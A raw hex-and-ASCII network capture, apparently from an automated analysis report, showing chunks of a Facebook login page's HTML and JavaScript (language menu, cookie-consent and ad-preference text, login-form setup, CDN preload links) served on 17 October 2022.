6c 61 73 73 4e 61 6d 65
                                                                                                                                  Data Ascii: 2c0ea\u0629","title":"","className":"headerItem"},{"class":"headerItem","value":"hi_IN","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_p_qg"},"label":"\u0939\u093f\u0928\u094d\u0926\u0940","title":"","className
                                                                                                                                  2022-10-17 20:07:20 UTC1131INData Raw: 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 5d 2c 7b 22 69 64 22 3a 22 75 5f 30 5f 36 5f 41 66 22 2c 22 62 65 68 61 76 69 6f 72 73 22 3a 5b 7b 22 5f 5f 6d 22 3a 22 58 55 49 4d 65 6e 75 57 69 74 68 53 71 75 61 72 65 43 6f 72 6e 65 72 22 7d 5d 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 5f 35 37 64 69 22 2c 22 6d 61 78 68 65 69 67 68 74 22 3a 35 30 30 2c 22 74 68 65 6d 65 22 3a 7b 22 5f 5f 6d 22 3a 22 58 55 49 4d 65 6e 75 54 68 65 6d 65 22 7d 7d 5d 2c 33 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 65 61 64 31 65 35 36 35 5f 30 5f 30 5f 52 32 22 2c 5b 22 44 69 61 6c 6f 67 58 22 2c 22 4c 61 79 65 72 46 61 64 65 4f 6e 48 69 64 65 22 2c 22 44 69 61 6c 6f 67 48 69 64 65 4f 6e 53 75 63 63 65 73 73 22 2c 22 4c 61 79 65 72 48 69 64 65 4f 6e 54 72 61
                                                                                                                                  Data Ascii: className":"headerItem"}],{"id":"u_0_6_Af","behaviors":[{"__m":"XUIMenuWithSquareCorner"}],"className":"_57di","maxheight":500,"theme":{"__m":"XUIMenuTheme"}}],3],["__inst_ead1e565_0_0_R2",["DialogX","LayerFadeOnHide","DialogHideOnSuccess","LayerHideOnTra
                                                                                                                                  2022-10-17 20:07:20 UTC1132INData Raw: 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 4b 55 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 34 2d 69 32 20 5f 70 69 67 20 5f 39 6f 2d 63 20 5f 39 70 6c 6c 20 5f 35 30 66 34 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6c 32 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6c 33 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 51 76 36 44 33 48 54 65 5a 55 59 20 73 78 5f 35 37 37 63 36 30 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 36 61 20 75 69 50 6f 70 6f 76 65 72 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 37 5f 77 30 5c 22 3e 5c 75 30 30 33 43 61 20
                                                                                                                                  Data Ascii: _9f5fac15_0_0_KU",{"__html":"\u003Cdiv>\u003Cdiv class=\"_4-i2 _pig _9o-c _9pll _50f4\">\u003Cdiv class=\"_9xl2\">\u003Cdiv class=\"_9xl3\">\u003Ci class=\"img sp_Qv6D3HTeZUY sx_577c60\">\u003C\/i>\u003Cdiv class=\"_6a uiPopover\" id=\"u_0_7_w0\">\u003Ca
                                                                                                                                  2022-10-17 20:07:20 UTC1134INData Raw: 20 70 65 6f 70 6c 65 20 77 68 6f 20 68 61 76 65 20 61 6e 20 61 63 63 6f 75 6e 74 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 30 5c 22 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 46 6f 72 20 61 64 76 65 72 74 69 73 69 6e 67 20 61 6e 64 20 6d 65 61 73 75 72 65 6d 65 6e 74 20 73 65 72 76 69 63 65 73 20 6f 66 66 20 6f 66 20 46 61 63 65 62 6f 6f 6b 20 50 72 6f 64 75 63 74 73 2c 20 61 6e 61 6c 79 74 69 63 73 2c 20 61 6e 64 20 74 6f 20 70 72 6f 76 69 64 65 20 63 65 72 74 61 69 6e 20 66 65 61 74 75 72 65 73 20 61 6e 64 20 69 6d 70 72 6f 76 65 20 6f 75 72 20 73 65 72 76 69 63 65 73
                                                                                                                                  Data Ascii: people who have an account\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003Cdiv>\u003Cdiv>For advertising and measurement services off of Facebook Products, analytics, and to provide certain features and improve our services
                                                                                                                                  2022-10-17 20:07:20 UTC1135INData Raw: 65 62 6f 6f 6b 20 50 72 6f 64 75 63 74 73 2c 20 61 6e 61 6c 79 74 69 63 73 2c 20 61 6e 64 20 74 6f 20 70 72 6f 76 69 64 65 20 63 65 72 74 61 69 6e 20 66 65 61 74 75 72 65 73 20 61 6e 64 20 69 6d 70 72 6f 76 65 20 6f 75 72 20 73 65 72 76 69 63 65 73 20 66 6f 72 20 79 6f 75 2e 20 54 68 65 73 65 20 63 6f 6d 70 61 6e 69 65 73 20 61 6c 73 6f 20 75 73 65 20 63 6f 6f 6b 69 65 73 2e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 70 3e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 39 5f 4e 65 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 64 20 5f 39 6e 67 65 5c 22 20 74 69 74 6c 65 3d 5c 22 65 78
                                                                                                                                  Data Ascii: ebook Products, analytics, and to provide certain features and improve our services for you. These companies also use cookies.\u003C\/div>\u003C\/div>\u003Cp>\u003C\/p>\u003Cdiv class=\"_9vtg\" id=\"u_0_9_Ne\">\u003Cbutton class=\"_9ngd _9nge\" title=\"ex
                                                                                                                                  2022-10-17 20:07:20 UTC1137INData Raw: 6f 72 6b 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 5c 2f 75 6c 3e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 30 5c 22 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6b 5c 22 3e 4f 74 68 65 72 20 77 61 79 73 20 79 6f 75 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 79 6f 75 72 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c
                                                                                                                                  Data Ascii: ork\u003C\/li>\u003C\/ul>\u003C\/p>\u003C\/div>\u003C\/p>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cp class=\"_9o-k\">Other ways you can control your information\u003C\/p>\u003C\/div>\
                                                                                                                                  2022-10-17 20:07:20 UTC1138INData Raw: 73 69 6e 67 20 79 6f 75 72 20 61 64 20 70 72 65 66 65 72 65 6e 63 65 73 20 74 6f 20 64 65 74 65 72 6d 69 6e 65 20 77 68 69 63 68 20 61 64 73 20 79 6f 75 20 6d 61 79 20 62 65 20 69 6e 74 65 72 65 73 74 65 64 20 69 6e 20 73 65 65 69 6e 67 2e 20 59 6f 75 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 74 68 69 73 20 69 6e 20 79 6f 75 72 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 73 65 74 74 69 6e 67 73 5c 2f 61 64 73 5c 2f 5c 22 3e 61 64 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 61 3e 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 73 69 2d 5c 22 3e 41 64 20 70 72 65 66 65 72 65 6e 63 65 73 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30
                                                                                                                                  Data Ascii: sing your ad preferences to determine which ads you may be interested in seeing. You can control this in your \u003Ca href=\"https:\/\/www.facebook.com\/settings\/ads\/\">ad settings\u003C\/a>.\u003C\/p>\u003Cp class=\"_9si-\">Ad preferences\u003C\/p>\u00
                                                                                                                                  2022-10-17 20:07:20 UTC1139INData Raw: 73 73 3d 5c 22 69 6d 67 20 73 70 5f 51 76 36 44 33 48 54 65 5a 55 59 20 73 78 5f 33 61 36 38 31 38 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 62 20 5f 39 6e 67 61 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 20 63 61 6e 20 6f 70 74 20 6f 75 74 20 6f 66 20 73 65 65 69 6e 67 20 6f 6e 6c 69 6e 65 20 69 6e 74 65 72 65 73 74 2d 62 61 73 65 64 20 61 64 73 20 66 72 6f 6d 20 46 61 63 65 62 6f 6f 6b 20 61 6e 64 20 6f 74 68 65 72 20 70 61 72 74 69 63 69 70 61 74 69 6e 67 20 63 6f 6d 70 61 6e 69 65 73 20 74 68 72
                                                                                                                                  Data Ascii: ss=\"img sp_Qv6D3HTeZUY sx_3a6818\">\u003C\/i>\u003C\/span>\u003C\/div>\u003C\/button>\u003Cdiv class=\"_9ngb _9nga\">\u003Cdiv>\u003Cp class=\"_9o-m\">You can opt out of seeing online interest-based ads from Facebook and other participating companies thr
                                                                                                                                  2022-10-17 20:07:20 UTC1140INData Raw: 33 34 36 64 0d 0a 48 42 66 63 54 76 6a 6c 69 4e 52 47 70 71 39 42 33 43 67 6d 46 47 32 66 77 67 49 6e 4d 32 70 78 4c 48 6c 46 64 55 36 4d 43 78 4d 46 66 36 71 6d 31 79 4e 6a 33 31 68 4e 5f 4b 6d 34 38 56 61 62 65 70 38 7a 35 72 31 30 6c 57 63 44 35 67 52 4f 64 30 4d 55 36 47 71 63 64 69 58 36 52 79 55 71 4c 51 66 35 34 69 73 5f 74 44 6d 71 37 36 59 51 5a 76 6c 69 32 4e 32 4c 4d 49 70 72 46 43 36 76 2d 38 6b 67 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 20 6f 66 20 43 61 6e 61 64 61 5c 75 30
                                                                                                                                  Data Ascii: 346dHBfcTvjliNRGpq9B3CgmFG2fwgInM2pxLHlFdU6MCxMFf6qm1yNj31hN_Km48Vabep8z5r10lWcD5gROd0MU6GqcdiX6RyUqLQf54is_tDmq76YQZvli2N2LMIprFC6v-8kg\" target=\"_blank\" rel=\"noopener nofollow\" data-lynx-mode=\"asynclazy\">Digital Advertising Alliance of Canada\u0
                                                                                                                                  2022-10-17 20:07:20 UTC1142INData Raw: 72 65 6c 3d 5c 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 79 6f 75 72 61 64 63 68 6f 69 63 65 73 2e 63 61 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 32 53 56 79 79 48 4f 55 6b 37 36 4b 56 78 31 53 31 52 69 7a 6f 4c 55 47 65 36 61 53 6f 58 67
                                                                                                                                  Data Ascii: rel=\"noopener nofollow\" data-lynx-mode=\"asynclazy\">Digital Advertising Alliance\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fyouradchoices.ca\u00252F&amp;h=AT2SVyyHOUk76KVx1S1RizoLUGe6aSoXg
                                                                                                                                  2022-10-17 20:07:20 UTC1143INData Raw: 6f 75 20 74 6f 20 63 68 6f 6f 73 65 20 77 68 65 74 68 65 72 20 62 72 6f 77 73 65 72 20 63 6f 6f 6b 69 65 73 20 61 72 65 20 73 65 74 20 61 6e 64 20 74 6f 20 64 65 6c 65 74 65 20 74 68 65 6d 2e 20 54 68 65 73 65 20 63 6f 6e 74 72 6f 6c 73 20 76 61 72 79 20 62 79 20 62 72 6f 77 73 65 72 2c 20 61 6e 64 20 6d 61 6e 75 66 61 63 74 75 72 65 72 73 20 6d 61 79 20 63 68 61 6e 67 65 20 62 6f 74 68 20 74 68 65 20 73 65 74 74 69 6e 67 73 20 74 68 65 79 20 6d 61 6b 65 20 61 76 61 69 6c 61 62 6c 65 20 61 6e 64 20 68 6f 77 20 74 68 65 79 20 77 6f 72 6b 20 61 74 20 61 6e 79 20 74 69 6d 65 2e 20 41 73 20 6f 66 20 35 20 4f 63 74 6f 62 65 72 20 32 30 32 30 2c 20 79 6f 75 20 6d 61 79 20 66 69 6e 64 20 61 64 64 69 74 69 6f 6e 61 6c 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62
                                                                                                                                  Data Ascii: ou to choose whether browser cookies are set and to delete them. These controls vary by browser, and manufacturers may change both the settings they make available and how they work at any time. As of 5 October 2020, you may find additional information ab
                                                                                                                                  2022-10-17 20:07:20 UTC1145INData Raw: 32 46 5c 75 30 30 32 35 32 46 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 5c 75 30 30 32 35 32 46 65 6e 2d 55 53 5c 75 30 30 32 35 32 46 6b 62 5c 75 30 30 32 35 32 46 65 6e 61 62 6c 65 2d 61 6e 64 2d 64 69 73 61 62 6c 65 2d 63 6f 6f 6b 69 65 73 2d 77 65 62 73 69 74 65 2d 70 72 65 66 65 72 65 6e 63 65 73 26 61 6d 70 3b 68 3d 41 54 32 6c 6d 34 39 30 32 4d 4d 6d 62 2d 33 78 44 74 71 4d 4c 4a 36 44 2d 48 75 47 48 6a 6f 30 64 74 41 6c 77 48 62 43 68 38 4d 56 63 63 63 47 71 6b 51 37 51 37 4b 5a 37 55 73 2d 4f 6f 55 47 74 33 7a 37 48 54 56 6a 6a 74 4b 39 59 51 6a 2d 59 72 73 57 5f 63 4f 32 75 42 71 2d 42 42 74 59 4a 34 33 66 79 75 6d 63 59 46 62 5a 2d 32 6c 59 51 38 6a 5f 58 38 35 4e 4c 52 61 73 75 64 62 77 51 4b 38 36 4f 61 39 55 6b 71 4a 6e 74 67
                                                                                                                                  Data Ascii: 2F\u00252Fsupport.mozilla.org\u00252Fen-US\u00252Fkb\u00252Fenable-and-disable-cookies-website-preferences&amp;h=AT2lm4902MMmb-3xDtqMLJ6D-HuGHjo0dtAlwHbCh8MVcccGqkQ7Q7KZ7Us-OoUGt3z7HTVjjtK9YQj-YrsW_cO2uBq-BBtYJ43fyumcYFbZ-2lYQ8j_X85NLRasudbwQK86Oa9UkqJntg
                                                                                                                                  2022-10-17 20:07:20 UTC1146INData Raw: 68 4a 76 62 32 33 54 75 41 76 62 72 66 7a 30 77 32 43 56 44 66 6c 73 44 6f 42 52 70 75 50 51 38 46 6c 65 33 72 59 4d 64 79 6d 4b 64 53 46 41 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 4f 70 65 72 61 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 5c 2f 75 6c 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63
                                                                                                                                  Data Ascii: hJvb23TuAvbrfz0w2CVDflsDoBRpuPQ8Fle3rYMdymKdSFA\" target=\"_blank\" rel=\"noopener nofollow\" data-lynx-mode=\"asynclazy\">Opera\u003C\/a>\u003C\/li>\u003C\/ul>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv c
                                                                                                                                  2022-10-17 20:07:20 UTC1148INData Raw: 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 61 5f 66 48 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 4e 65 64 65 72 6c 61 6e 64 73 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 62 5f 2b 62 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 4e 6f 72 73 6b 20 28 62 6f 6b 6d 5c 75 30 30 65 35 6c 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 63 5f 44 54 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 50 6f 6c 73 6b 69 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 64 5f 70 57 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 50 6f 72 74 75 67 75 5c 75 30 30 65 61 73 20 28 42 72 61 73 69 6c 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30
                                                                                                                                  Data Ascii: markup_3310c079_0_a_fH",{"__html":"Nederlands"},1],["__markup_3310c079_0_b_+b",{"__html":"Norsk (bokm\u00e5l)"},1],["__markup_3310c079_0_c_DT",{"__html":"Polski"},1],["__markup_3310c079_0_d_pW",{"__html":"Portugu\u00eas (Brasil)"},1],["__markup_3310c079_0
                                                                                                                                  2022-10-17 20:07:20 UTC1149INData Raw: 7d 2c 31 5d 5d 2c 22 65 6c 65 6d 65 6e 74 73 22 3a 5b 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 31 5f 56 4a 22 2c 22 75 5f 30 5f 30 5f 42 47 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 70 46 22 2c 22 67 6c 6f 62 61 6c 43 6f 6e 74 61 69 6e 65 72 22 2c 32 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 32 5f 42 4f 22 2c 22 63 6f 6e 74 65 6e 74 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f 30 5f 30 5f 35 59 22 2c 22 6c 6f 67 69 6e 5f 66 6f 72 6d 22 2c 32 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 30 5f 2b 6f 22 2c 22 75 5f 30 5f 32 5f 6f 77 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 31 5f 56 61 22 2c 22 75 5f
                                                                                                                                  Data Ascii: },1]],"elements":[["__elem_a588f507_0_1_VJ","u_0_0_BG",1],["__elem_a588f507_0_0_pF","globalContainer",2],["__elem_a588f507_0_2_BO","content",1],["__elem_835c633a_0_0_5Y","login_form",2],["__elem_f46f4946_0_0_+o","u_0_2_ow",1],["__elem_f46f4946_0_1_Va","u_
                                                                                                                                  2022-10-17 20:07:20 UTC1151INData Raw: 46 22 5d 2c 5b 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 70 46 22 7d 5d 5d 5d 2c 5b 22 4b 65 79 62 6f 61 72 64 41 63 74 69 76 69 74 79 4c 6f 67 67 65 72 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 46 6f 63 75 73 52 69 6e 67 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 45 72 72 6f 72 4d 65 73 73 61 67 65 43 6f 6e 73 6f 6c 65 22 2c 22 6c 69 73 74 65 6e 46 6f 72 55 6e 63 61 75 67 68 74 45 72 72 6f 72 73 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 48 61 72 64 77 61 72 65 43 53 53 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 57 65 62 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 53 65 6c 65 63 74 6f 72 48 61 6e 64 6c 65 72 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 65 63 37 37 61 66 62 64 5f 30 5f
                                                                                                                                  Data Ascii: F"],[[{"__m":"__elem_a588f507_0_0_pF"}]]],["KeyboardActivityLogger","init",[],[]],["FocusRing","init",[],[]],["ErrorMessageConsole","listenForUncaughtErrors",[],[]],["HardwareCSS","init",[],[]],["WebCookieLocaleSelectorHandler","init",["__elem_ec77afbd_0_
                                                                                                                                  2022-10-17 20:07:20 UTC1152INData Raw: 65 72 50 72 65 66 69 6c 6c 4c 6f 67 67 69 6e 67 22 2c 22 69 6e 69 74 50 61 73 73 77 6f 72 64 46 69 65 6c 64 4c 6f 67 67 69 6e 67 22 2c 5b 5d 2c 5b 7b 22 70 61 73 73 77 6f 72 64 46 69 65 6c 64 49 44 22 3a 22 70 61 73 73 22 7d 5d 5d 2c 5b 22 4c 6f 67 69 6e 46 6f 72 6d 54 6f 67 67 6c 65 22 2c 22 69 6e 69 74 54 6f 67 67 6c 65 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 33 5f 42 62 22 2c 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 34 5f 79 67 22 2c 22 5f 5f 65 6c 65 6d 5f 37 30 62 31 36 63 36 39 5f 30 5f 30 5f 30 66 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 33 5f 42 62 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 34 5f 79 67 22 7d 2c 7b
                                                                                                                                  Data Ascii: erPrefillLogging","initPasswordFieldLogging",[],[{"passwordFieldID":"pass"}]],["LoginFormToggle","initToggle",["__elem_a588f507_0_3_Bb","__elem_a588f507_0_4_yg","__elem_70b16c69_0_0_0f"],[{"__m":"__elem_a588f507_0_3_Bb"},{"__m":"__elem_a588f507_0_4_yg"},{
                                                                                                                                  2022-10-17 20:07:20 UTC1153INData Raw: 31 32 62 62 0d 0a 6c 65 61 6e 75 70 28 54 69 6d 65 53 6c 69 63 65 29 7d 29 7d 29 3b 7d 29 3b 0a 0a 6f 6e 6c 6f 61 64 52 65 67 69 73 74 65 72 5f 44 45 50 52 45 43 41 54 45 44 28 66 75 6e 63 74 69 6f 6e 20 28 29 7b 62 65 67 69 6e 5f 70 6f 6c 6c 69 6e 67 5f 6c 6f 67 69 6e 5f 63 6f 6f 6b 69 65 73 28 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 61 64 73 5c 2f 6d 61 6e 61 67 65 72 5c 2f 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 2f 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 6e 6f 77 5f 69 6e 6c 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 70 3d 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 3b 72 65 74 75 72 6e 20 70 26 26 70
                                                                                                                                  Data Ascii: 12bbleanup(TimeSlice)})});});onloadRegister_DEPRECATED(function (){begin_polling_login_cookies("https:\/\/www.facebook.com\/ads\/manager\/account_settings\/account_billing");});</script><script>now_inl=(function(){var p=window.performance;return p&&p
                                                                                                                                  2022-10-17 20:07:20 UTC1155INData Raw: 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 65 2f 72 2f 5f 53 36 62 5a 63 32 4e 72 71 7a 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6e 6f 6e 63 65 3d 22 6d 71 36 6d 4f 76 59 54 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 69 37 4d 35 34 2f 79 4b 2f 6c 2f 65 6e 5f 55 53 2f 37 58 46 72 73 4d 5a
                                                                                                                                  Data Ascii: " /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/_S6bZc2Nrqz.js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous" nonce="mq6mOvYT" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3i7M54/yK/l/en_US/7XFrsMZ
                                                                                                                                  2022-10-17 20:07:20 UTC1156INData Raw: 2f 76 33 2f 79 69 2f 6c 2f 30 2c 63 72 6f 73 73 2f 75 61 52 55 5a 6b 31 38 79 4e 49 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 6b 2f 6c 2f 30 2c 63 72 6f 73 73 2f 67 33 64 76 69 2d 76 64 77 45 36 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 63 72 6f 73 73 6f 72 69 